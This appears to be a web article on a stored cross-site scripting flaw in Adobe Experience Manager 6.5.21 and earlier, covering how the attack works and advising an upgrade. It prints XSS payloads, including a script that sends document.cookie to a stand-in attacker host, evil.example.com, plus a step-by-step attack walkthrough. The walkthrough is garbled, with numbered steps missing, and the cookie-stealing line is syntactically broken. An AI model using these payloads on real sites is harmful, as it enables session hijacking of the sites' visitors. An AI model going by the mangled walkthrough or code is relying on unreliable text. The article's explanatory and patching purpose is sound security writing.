CVE-2024-52864 - Stored XSS Vulnerability in Adobe Experience Manager (AEM) — Exploit Details & How It Works

CVE-2024-52864 is a newly reported security flaw affecting Adobe Experience Manager versions 6.5.21 and earlier. This is a stored Cross-Site Scripting (XSS) vulnerability, which means attackers can inject and permanently store malicious scripts on AEM-powered websites. When unsuspecting users view the affected pages or forms, these scripts run in their browsers, letting attackers steal session cookies, perform actions on behalf of the user, or redirect them to malicious websites.

Let’s break down how this vulnerability works, see example code a hacker might use, and discuss how to protect your site.

What Is Stored XSS?

In a stored XSS attack, malicious code is saved (“stored”) in a web application, such as in a form field or comment section. Whenever someone views the web page, the harmful code gets sent to their browser and runs as if it were trusted page content.

If your application doesn’t properly sanitize user inputs, attackers can exploit this to execute JavaScript in the context of your domain.

Where’s the Vulnerability?

Adobe Experience Manager (AEM) is an enterprise CMS widely used to manage digital assets and web content. In versions 6.5.21 and earlier, certain form fields within the system are not properly sanitized. Attackers can input JavaScript payloads in these fields, and the content is later displayed on web pages without being filtered.

Adobe’s official details

- Security Bulletin: APSB24-38

Let’s See It In Action

Imagine a website using AEM where users can fill out and submit a feedback form. The “comments” field is vulnerable. Here’s how an attacker might exploit this:

The attacker submits a comment like

<script>alert('XSS by Hacker!');</script>

3. When Someone Views the Page

Later, another user (or an administrator) browses to the page that displays this stored comment. When their browser loads the page, the JavaScript runs:

A more dangerous payload might harvest cookies or session tokens

<script>
  fetch('https://evil.example.com/steal?cookie='; + document.cookie);
</script>

When executed, this script sends the user’s cookie information to the attacker’s server.

Full Attack Walkthrough

1. Attacker finds a vulnerable form (e.g., /content/we-retail/feedback.html).

Any user who visits the page triggers the embedded script.

5. Attacker gains control/functions in the user’s browser.

Can be used to spread further malware.

## Patch/Prevention

Upgrade AEM to version 6.5.22 or later. Adobe has fixed the vulnerability in the latest patch release:

- Adobe Experience Manager Security Updates

Links & References

- Adobe Security Advisory APSB24-38 (CVE-2024-52864)
- OWASP XSS Explained
- Adobe Experience Manager Release Notes

Conclusion

CVE-2024-52864 highlights why web applications must always treat user inputs as untrusted. Adobe Experience Manager 6.5.21 and earlier are at risk if not updated. Stored XSS is one of the most dangerous vulnerabilities because the attacker can compromise *all* users who visit the infected page. Patch and safeguard your forms now to keep your website and your users out of danger.

Want to check if you’re affected? Try submitting a harmless <script>alert(1)</script> in your forms. If you see a popup, your installation is vulnerable—update today!

Timeline

Published on: 12/10/2024 22:15:22 UTC
Last modified on: 12/13/2024 17:37:46 UTC